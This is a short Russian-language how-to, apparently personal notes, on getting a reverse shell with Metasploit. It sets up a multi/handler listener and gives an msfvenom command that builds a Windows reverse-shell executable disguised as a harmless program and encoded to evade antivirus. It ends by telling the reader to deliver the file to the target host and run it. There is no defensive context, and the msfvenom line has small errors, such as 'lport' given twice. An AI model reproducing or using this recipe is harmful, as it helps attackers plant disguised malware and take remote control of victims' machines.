# Reverse shell через MSFConsloe
1. Создать исполняемый shell
Создаем сервер для приема подключений
```bash=
msfconsole
use exploit/multi/handler
set payload windows/shell/reverse_tcp
```
Создаем исполняемый файл замаскировать его под неподозрительный файл, и закодировать от ообнаружения антивирусами
```bash=
msfvenom -p windows/shell/reverse_tcp -e x86 -x iexplorer_good.exe -k -f exe -o iexplorer.exe -e x86/shikata_ga_nai lport=192.168.1.106 lport=4444
```
2. Передать файл на атакуемый хост, запустить файл